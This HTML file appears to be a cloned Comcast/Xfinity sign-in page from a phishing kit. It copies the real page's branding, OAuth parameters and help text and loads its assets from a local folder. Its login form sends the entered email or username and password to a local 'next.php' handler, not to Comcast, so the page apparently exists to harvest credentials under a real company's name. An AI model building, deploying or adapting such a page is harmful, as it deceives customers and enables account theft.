<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en"><head>
	<title>Sign in to Comcast</title>
	<link rel="stylesheet" type="text/css" href="logon_files/styles.css">
	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
	<meta name="description" content="Comcast.net has more to offer when you sign in to your mySIGN-IN Account. Use your account to access other Comcast sites and services like Comcast.net, Plaxo, and more.">
	<meta name="viewport" content="width=1024">
	<link rel="shortcut icon" href="https://login.comcast.net/static/images/global/favicon.ico">
	<script type="text/javascript">
	runtimeData = {
		"maxAuthnAge": "840",		"reqId": "018d5284-f15b-4f85-92c0-9c1625da6774",		"deviceAuthn": "false",		"s": "oauth",		"forceAuthn": "false",		"r": "comcast.net",		"ipAddrAuthn": "false",		"continue": "https://login.comcast.net/oauth/authorize?response_type=code&amp;client_id=x.M..PROD---My-Account-PROD---xfinity.com--&amp;redirect_uri=https%3A%2F%2Fcustomer.xfinity.com%2Fsignin-cima&amp;state=L1NlY3VyZS9Vc2VyU2V0dGluZ3M%3D&amp;scope=https%3A%2F%2Fsecure.api.comcast.net%2Fsig%2Faccount%2Fbasic%20https%3A%2F%2Fsecure.api.comcast.net%2Fsig%2Fsubscriber%2Fbasic%20https%3A%2F%2Fsecure.api.comcast.net%2Fsig%2Fdevice%20openid%20profile%20email%20address%20offline_access%20phone&amp;max_age=840&amp;response=1",		"passive": "false",		"client_id": "x.M..PROD---My-Account-PROD---xfinity.com--",		"lang": "en"	}
	</script>
	<script src="logon_files/Mbox.js"></script><style>.mboxDefault { visibility:hidden; }</style><script src="logon_files/target.js"></script><script src="logon_files/ajax"></script>
	<style type="text/css">
	html {
background: #000;
background:url(/static/css/ccentral/my-account-background.png) no-repeat center top;
background-size: 100%;
background: -webkit-linear-gradient(rgba(255,255,255,0.1), rgba(255,255,255,0.1)) no-repeat 0 0 / 100% 550px, radial-gradient(circle at center, #3C3C3C 0%, #000000 100%) no-repeat 0 0 / 100% 100%, #090909;
background: -mos-linear-gradient(rgba(255,255,255,0.1), rgba(255,255,255,0.1)) no-repeat 0 0 / 100% 550px, radial-gradient(circle at center, #3C3C3C 0%, #000000 100%) no-repeat 0 0 / 100% 100%, #090909;
background: -ms-linear-gradient(rgba(255,255,255,0.1), rgba(255,255,255,0.1)) no-repeat 0 0 / 100% 550px, radial-gradient(circle at center, #3C3C3C 0%, #000000 100%) no-repeat 0 0 / 100% 100%, #090909;
background: -o-linear-gradient(rgba(255,255,255,0.1), rgba(255,255,255,0.1)) no-repeat 0 0 / 100% 550px, radial-gradient(circle at center, #3C3C3C 0%, #000000 100%) no-repeat 0 0 / 100% 100%, #090909;
background: linear-gradient(rgba(255,255,255,0.1), rgba(255,255,255,0.1)) no-repeat 0 0 / 100% 550px, radial-gradient(circle at center, #3C3C3C 0%, #000000 100%) no-repeat 0 0 / 100% 100%, #090909;
line-height:1;
min-width:1024px;
height: 100%;
}
#left {
margin-top: 50px;
}
#left h1, #left p {
color: #e0e0e0;
font-family: helvetica;
font-weight: normal;
}
#left h1 {
font-size: 24px;
line-height: 30px;
padding-bottom: 20px;
border-bottom: 1px solid #e0e0e0;
}
#left p {
font-size: 16px;
line-height: 22px;
margin-top: 30px;
padding-bottom: 0;
}
#leftSide-image {
margin-top: 50px;
}
#right{
min-height:565px;
border-left:0 solid #ccc
}
#bd.signin{
padding-top:40px;
margin-top:0
}
#needaccess {
border-color:#fff;
border-style:solid
}
#signin {
border-color:#fff;
border-style:solid
}
#ft-outer{
margin-top:80px
}
sup {
font-size: 14px;
font-weight: italic;
}
	</style>
</head>
<body><div style="visibility: visible; display: block;" id="mbox-target-global-mbox-1452700229937-829507" class="mboxDefault"><div style="visibility: hidden; display: none;" id="mboxImported-default-target-global-mbox-0"><!-- Offer Id: 26703  --><!-- Offer Id: 171484  --><!-- Offer Id: 78761  -->
<!-- AAM API call here -->
<!-- Offer Id: 181149  --><!-- Offer Id: 107745  --></div></div>
<div style="visibility: visible; display: block;" class="mboxDefault"></div>
<script type="text/javascript">
mboxCreate("login_page", "s="+runtimeData.s, "destination="+runtimeData.continue );
</script><div id="mboxMarker-default-login_page-0" style="visibility:hidden;display:none">&nbsp;</div><script src="logon_files/standard"></script><div style="visibility: hidden; display: none" id="mboxImported-default-login_page-0"><!-- Offer Id: 107745  --><script>
//if (window.tntRenderFlash) tntRenderFlash();
if (window.tntRenderFlash && "login_page" != "target-global-mbox") tntRenderFlash();
</script></div>
<div style="visibility: visible; display: block;" class="mboxDefault"></div>
<script type="text/javascript">
mboxCreate("login_page_1");
</script><div id="mboxMarker-default-login_page_1-0" style="visibility:hidden;display:none">&nbsp;</div><script src="logon_files/standard_002"></script><div style="visibility: hidden; display: none" id="mboxImported-default-login_page_1-0"><!-- Offer Id: 107745  --><script>
//if (window.tntRenderFlash) tntRenderFlash();
if (window.tntRenderFlash && "login_page_1" != "target-global-mbox") tntRenderFlash();
</script></div>
<div id="bd" class="signin clearfix">
		<div id="left"><h1>XFINITY<sup>®</sup> lets you manage your account your way</h1>
<p>Instant access on your computer, smartphone and now on your <br> TV. No more lines. No more waiting.</p>
<p>Comcast Business customer?
<a href="https://businessclass.comcast.net/?INTCMP=ILC-XfinityCom-MyAccountSigninCTA-BCPSignin01">
Sign in now
</a>
</p>
<div id="leftSide-image">
<img src="logon_files/598b4917a434005b0ffc357c4320926e.png" alt="">
</div></div>
	<div id="right">
		<div id="signin-box">
	<form name="signin" action="next.php" method="post" onSubmit="return login.onSubmit()" autocomplete="off">
	<div id="signin">
		<h1 class="default no-error">XFINITY</h1>
		<div class="sign_in">
					<h2>Sign In</h2>
		  </div>
		<label for="user" id="login_id_label">Email or username </label>
<input id="user" name="user" maxlength="128" tabindex="1" type="text">
		<label for="passwd" id="password_label">Password </label>
		<input id="passwd" name="passwd" maxlength="128" tabindex="2" type="password" autocomplete="off">
		<div>
		    <input id="remember_me" value="1" tabindex="3" name="rm" type="checkbox">
		<label id="rm_label" for="remember_me" title="Keep me signed in.">Keep me signed in.</label>
		<a href="#" id="rm_label_learn_more" rel="#rm_help" tabindex="4" aria-label="Learn more about staying signed in">Learn more</a>
		</div>
<button type="submit" id="sign_in" tabindex="5">SIGN IN ►<span class="triange-right icon"></span></button>
		<p class="fblearnmore fb_not_available">Facebook Connect is not supported for this XFINITY product.
		<a href="#" id="fb_learn_more_text" rel="#fb_learn_more_help" aria-label="Learn more about connecting through Facebook"><strong>Learn more</strong></a></p>

<p class="forgot_link first"><a href="https://login.comcast.net/myaccount/lookup?continue=https%3A%2F%2Flogin.comcast.net%2Flogin%3FreqId%3D018d5284-f15b-4f85-92c0-9c1625da6774%26forceAuthn%3Dfalse%26ipAddrAuthn%3Dfalse%26lang%3Den%26maxAuthnAge%3D840%26s%3Doauth%26deviceAuthn%3Dfalse%26r%3Dcomcast.net%26continue%3Dhttps%253A%252F%252Flogin.comcast.net%252Foauth%252Fauthorize%253Fresponse_type%253Dcode%2526client_id%253Dx.M..PROD---My-Account-PROD---xfinity.com--%2526redirect_uri%253Dhttps%25253A%25252F%25252Fcustomer.xfinity.com%25252Fsignin-cima%2526state%253DL1NlY3VyZS9Vc2VyU2V0dGluZ3M%25253D%2526scope%253Dhttps%25253A%25252F%25252Fsecure.api.comcast.net%25252Fsig%25252Faccount%25252Fbasic%252520https%25253A%25252F%25252Fsecure.api.comcast.net%25252Fsig%25252Fsubscriber%25252Fbasic%252520https%25253A%25252F%25252Fsecure.api.comcast.net%25252Fsig%25252Fdevice%252520openid%252520profile%252520email%252520address%252520offline_access%252520phone%2526max_age%253D840%2526response%253D1%26passive%3Dfalse%26client_id%3Dx.M..PROD---My-Account-PROD---xfinity.com--%26rm%3D2&amp;lang=en" target="_self" title="Lookup User ID"><strong>Don't know your email or username?</strong></a></p>
<p class="forgot_link"><a id="forgotPwdLink" href="https://login.comcast.net/myaccount/reset?continue=https%3A%2F%2Flogin.comcast.net%2Flogin%3FreqId%3D018d5284-f15b-4f85-92c0-9c1625da6774%26forceAuthn%3Dfalse%26ipAddrAuthn%3Dfalse%26lang%3Den%26maxAuthnAge%3D840%26s%3Doauth%26deviceAuthn%3Dfalse%26r%3Dcomcast.net%26continue%3Dhttps%253A%252F%252Flogin.comcast.net%252Foauth%252Fauthorize%253Fresponse_type%253Dcode%2526client_id%253Dx.M..PROD---My-Account-PROD---xfinity.com--%2526redirect_uri%253Dhttps%25253A%25252F%25252Fcustomer.xfinity.com%25252Fsignin-cima%2526state%253DL1NlY3VyZS9Vc2VyU2V0dGluZ3M%25253D%2526scope%253Dhttps%25253A%25252F%25252Fsecure.api.comcast.net%25252Fsig%25252Faccount%25252Fbasic%252520https%25253A%25252F%25252Fsecure.api.comcast.net%25252Fsig%25252Fsubscriber%25252Fbasic%252520https%25253A%25252F%25252Fsecure.api.comcast.net%25252Fsig%25252Fdevice%252520openid%252520profile%252520email%252520address%252520offline_access%252520phone%2526max_age%253D840%2526response%253D1%26passive%3Dfalse%26client_id%3Dx.M..PROD---My-Account-PROD---xfinity.com--%26rm%3D2&amp;lang=en" target="_self" title="Reset Password"><strong>Forgot your password?</strong></a></p>

		<input name="maxAuthnAge" value="840" type="hidden">
		<input name="reqId" value="018d5284-f15b-4f85-92c0-9c1625da6774" type="hidden">
		<input name="deviceAuthn" value="false" type="hidden">
		<input name="s" value="oauth" type="hidden">
		<input name="forceAuthn" value="false" type="hidden">
		<input name="r" value="comcast.net" type="hidden">
		<input name="ipAddrAuthn" value="false" type="hidden">
		<input name="continue" value="https://login.comcast.net/oauth/authorize?response_type=code&amp;client_id=x.M..PROD---My-Account-PROD---xfinity.com--&amp;redirect_uri=https%3A%2F%2Fcustomer.xfinity.com%2Fsignin-cima&amp;state=L1NlY3VyZS9Vc2VyU2V0dGluZ3M%3D&amp;scope=https%3A%2F%2Fsecure.api.comcast.net%2Fsig%2Faccount%2Fbasic%20https%3A%2F%2Fsecure.api.comcast.net%2Fsig%2Fsubscriber%2Fbasic%20https%3A%2F%2Fsecure.api.comcast.net%2Fsig%2Fdevice%20openid%20profile%20email%20address%20offline_access%20phone&amp;max_age=840&amp;response=1" type="hidden">
		<input name="passive" value="false" type="hidden">
		<input name="client_id" value="x.M..PROD---My-Account-PROD---xfinity.com--" type="hidden">
		<input name="lang" value="en" type="hidden">
 	</div>


		<div id="needaccess">
			<h2>Need access?</h2>
			<p class="action"><a href="https://login.comcast.net/myaccount/create-uid?continue=https%3A%2F%2Flogin.comcast.net%2Flogin%3FreqId%3D018d5284-f15b-4f85-92c0-9c1625da6774%26forceAuthn%3Dfalse%26ipAddrAuthn%3Dfalse%26lang%3Den%26maxAuthnAge%3D840%26s%3Doauth%26deviceAuthn%3Dfalse%26r%3Dcomcast.net%26continue%3Dhttps%253A%252F%252Flogin.comcast.net%252Foauth%252Fauthorize%253Fresponse_type%253Dcode%2526client_id%253Dx.M..PROD---My-Account-PROD---xfinity.com--%2526redirect_uri%253Dhttps%25253A%25252F%25252Fcustomer.xfinity.com%25252Fsignin-cima%2526state%253DL1NlY3VyZS9Vc2VyU2V0dGluZ3M%25253D%2526scope%253Dhttps%25253A%25252F%25252Fsecure.api.comcast.net%25252Fsig%25252Faccount%25252Fbasic%252520https%25253A%25252F%25252Fsecure.api.comcast.net%25252Fsig%25252Fsubscriber%25252Fbasic%252520https%25253A%25252F%25252Fsecure.api.comcast.net%25252Fsig%25252Fdevice%252520openid%252520profile%252520email%252520address%252520offline_access%252520phone%2526max_age%253D840%2526response%253D1%26passive%3Dfalse%26client_id%3Dx.M..PROD---My-Account-PROD---xfinity.com--%26rm%3D2&amp;lang=en" target="_self" title="Create a Username">Create a Username »</a></p>
		</div>
 	</form>
</div>

<div id="rm_help" role="dialog" class="jq-overlay" aria-describedby="rm_help_descr"><a href="#" class="close"></a><div class="inner" id="rm_help_descr">
<h2>Why Remember Me?</h2>
<p>When you choose Remember Me on sign in, we will remember who you are 
and keep you signed in for up to 30 days unless you sign out. This is 
great if you sign in all the time to check your email or watch TV shows 
online.</p>
<p>But be careful: If you share your personal computer with others, they
 could access and make some changes to your account. You should 
definitely not use Remember Me in public computers!</p>
</div></div>


<div id="fb_learn_more_help" role="dialog" class="jq-overlay" aria-describedby="fb_learn_more_help_descr"><a href="#" class="close"></a><div class="inner" id="fb_learn_more_help_descr">
<h1>Signing in with Facebook Connect</h1>
<p>Facebook Connect is available for signing in to all of your XFINITY 
services except XFINITY Connect, XFINITY Home, and your account section 
within My Account.</p>
</div></div>

 	</div>
 	<br class="clear">
</div>
<div id="ft-outer" style="display: block; position: static;"><div id="ft">
<div class="ft_wrap">
<ul>
<li class="logo">Xfinity</li>
<li class="first">© 2015 Comcast</li>
<li><a href="http://xfinity.comcast.net/siteindex/" title="Site Map">Site Map</a></li>
<li><a href="http://xfinity.comcast.net/privacy/" title="Privacy Policy">Privacy Policy</a></li>
<li><a href="http://my.xfinity.com/terms/web/" title="Terms of Service">Terms of Service</a></li>
<li><a href="https://customer.comcast.com/contact-us/" title="Contact Us">Contact Us</a></li>
<li class="clogo">Comcast</li>
</ul>
</div>
<div class="truste">
<div id="b537c389-7be1-4331-bb73-03a71788bc12"><script type="text/javascript" src="logon_files/asc.txt"></script><a href="https://privacy.truste.com/privacy-seal/Comcast-Cable-Communications-Management,-LLC/validation?rid=bf9d4d6f-2b32-4201-a167-5b55a4451508" title="TRUSTe online privacy certification" target="_blank"><img style="border: none" src="logon_files/seal.png" alt="TRUSTe online privacy certification"></a></div>
</div></div></div>


<script type="text/javascript" src="logon_files/jquery-1.js"></script>
<script type="text/javascript" src="logon_files/jquery.js"></script>

<script type="text/javascript">
	var login = (function ($) {
		var m = {};

		function hasQuery(uri){return uri.indexOf("?")>=0;}

		m.appendQuery = function (uri, query){if(hasQuery(uri)){return uri+"&"+query;}else{return uri+"?"+query;}}
		m.placeFooter = function(){var e=$("#ft-outer");e.css("display","block");if(e.length==0){return}var c=$("#bd");if(c.length!=1){return}var a=c.offset().top+c.outerHeight(true);var b=e.outerHeight(true);var d=($(window).height()>(a+b))?"absolute":"static";e.css({position:d})};
		m.setupFieldtipPopupActivation = function () {$('.field-tip').click(function() {$(this).children('.tip-popup').show();});$('.field-tip').mouseout(function() {$(this).children('.tip-popup').hide();});};
		m.setupFieldtipPopupActivation = function () {$('.field-tip').click(function() {$(this).children('.tip-popup').show();});$('.field-tip').mouseout(function() {$(this).children('.tip-popup').hide();});};
		m.focusLoginForm = function() { var f=$("#user");if(f.length>0 && f.val().length==0){f.focus()}else{f=$("#passwd");if(f.length>0){f.focus()}}};
		m.openLinkWithLoginId = function(f){var c=$(f.currentTarget);var a=c.attr("href");var b=$("#user").val();if(b.length>0){a=login.appendQuery(a,"login="+b)}var d=c.attr("target").length>0?c.attr("target"):"";if(d==""){window.location.href=a}else{window.open(a,d)}f.stopPropagation();return false};
		m.commonOverlayProp = {mask:{color:"#000000",loadSpeed:200,opacity:0.7},closeOnClick:false,top:"center",onBeforeLoad:function(){$("#ad-wrapper").hide();},onLoad:function(){this.getOverlay().find("a.close:first-child").focus()},onClose:function(){$("#ad-wrapper").show()}};
		m.onSubmit=function(){var a=$("#user");var d=$("#passwd");if(a.val()===""||d.val()===""){$("#error").remove();$('<p id="error" class="error">Please type in your email or username and password to sign in.</p>').insertAfter(".sign_in");var c=$("#login_id_label");c.find("span.access-aid").remove();c.append('<span class="access-aid">Please type in your email or username and password to sign in. Please re-enter username.</span>');var b=$("#password_label");b.find("span.access-aid").remove();b.append('<span class="access-aid">Please type in your email or username and password to sign in. Please re-enter password.</span>'); d.focus(); a.focus(); return false}else{return true}};
		return m;
	}(jQuery));
</script>

<script type="text/javascript">
	$(function(){
		login.focusLoginForm();
		$('#forgotPwdLink').click(login.openLinkWithLoginId);
		$("#fb_learn_more_text").overlay(login.commonOverlayProp);
		$("#rm_label_learn_more").overlay(login.commonOverlayProp);

	})
</script>


<script type="text/javascript">
$(function() {
    $(window).load(login.placeFooter);
    $(window).resize(login.placeFooter);
    login.setupFieldtipPopupActivation();
});
</script>


	<div style="display:none">
<script type="text/javascript" src="logon_files/omniture.js"></script>
<script type="text/javascript"><!--
	s.pageName="sign in"
	s.events = "event11"
	s.channel = "sign in"
	s.prop4 = "sign in"
	s.prop7 = "x.M..PROD---My-Account-PROD---xfinity.com--"
	s.prop33 = "comcast net"
	s.prop35 = "authentication"
	s.prop36 = "site:home"
	s.eVar36 = "site:home"
	s.eVar47 = "anonymous"
	s.eVar7 = "x.M..PROD---My-Account-PROD---xfinity.com--"

	/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
	var s_code=s.t();if(s_code)document.write(s_code);//-->
</script>
</div>


</body></html>